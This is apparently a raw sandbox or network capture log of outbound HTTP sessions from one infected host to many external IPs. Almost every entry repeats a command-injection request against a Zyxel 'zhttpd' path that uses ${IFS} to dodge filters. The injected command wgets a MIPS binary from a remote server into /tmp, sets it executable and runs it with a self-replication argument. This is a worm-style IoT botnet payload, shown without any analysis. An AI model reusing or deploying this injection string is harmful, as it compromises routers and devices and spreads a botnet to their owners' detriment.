                                          Jan 14, 2024 15:46:33.381763935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8615192.168.2.2349200155.200.87.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381779909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8616192.168.2.235811413.231.136.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381820917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8617192.168.2.2346150147.85.32.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381833076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8618192.168.2.2338692130.245.80.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381844997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8619192.168.2.233562046.145.52.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381867886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8620192.168.2.2355742154.79.197.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381901979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8621192.168.2.2356158170.137.154.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381938934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8622192.168.2.2336118183.163.134.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381949902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8623192.168.2.233345295.204.176.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381968975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8624192.168.2.235114882.23.103.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381994009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8625192.168.2.233296257.125.28.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382046938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8626192.168.2.235931867.252.115.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382066011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8627192.168.2.2345300139.71.167.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382098913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8628192.168.2.235694087.169.232.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382118940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8629192.168.2.2357866117.29.218.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382132053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8630192.168.2.2353602182.209.86.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382169962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8631192.168.2.235788623.122.107.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382209063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8632192.168.2.233534499.182.170.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382251024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8633192.168.2.2338668158.102.24.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382257938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8634192.168.2.235925093.196.20.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382285118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8635192.168.2.2355276168.139.18.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382308006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8636192.168.2.235784836.181.251.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382354021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8637192.168.2.233601696.222.254.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382359982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8638192.168.2.2347260107.5.160.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382394075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8639192.168.2.2339704173.190.179.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382446051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8640192.168.2.235687635.74.124.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382462978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8641192.168.2.233870012.119.250.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382469893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8642192.168.2.233912262.4.22.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382529974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8643192.168.2.2339312213.65.236.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382551908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8644192.168.2.2360884187.197.119.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382560968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8645192.168.2.2335604221.186.10.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382577896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8646192.168.2.233703034.114.129.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382601023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8647192.168.2.2350700104.8.157.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382633924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8648192.168.2.23522705.74.120.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382662058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8649192.168.2.2332888130.104.184.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382672071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8650192.168.2.23421941.153.112.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382718086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8651192.168.2.2340896135.39.187.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382746935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8652192.168.2.2334816190.82.172.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382752895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8653192.168.2.2344618152.180.162.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382783890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8654192.168.2.2335930138.92.170.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382817030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8655192.168.2.235418060.69.211.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382838964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8656192.168.2.2345378210.140.126.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382874966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8657192.168.2.2351666196.156.161.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382901907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8658192.168.2.2360708194.71.211.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382924080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8659192.168.2.233323688.246.103.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382947922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8660192.168.2.2352750122.200.107.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382967949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8661192.168.2.2350282144.164.211.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.382992029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8662192.168.2.233990262.187.183.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383012056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8663192.168.2.2354456108.196.212.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383053064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8664192.168.2.2358508180.102.152.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383065939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8665192.168.2.2338066200.55.80.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383100986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8666192.168.2.233533095.9.35.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383128881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8667192.168.2.2348840154.176.18.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383162022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8668192.168.2.233374464.43.115.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383187056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8669192.168.2.235899881.48.87.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383196115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8670192.168.2.235444282.223.86.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383239985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8671192.168.2.235116241.251.84.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383240938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8672192.168.2.2344514133.154.88.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383255959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8673192.168.2.2356728152.104.41.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383317947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8674192.168.2.2353062125.188.168.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383343935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8675192.168.2.2334026105.41.238.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383347988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8676192.168.2.2345230132.202.91.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.383383989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8677192.168.2.23345282.175.243.198443
                                          TimestampBytes transferredDirectionData
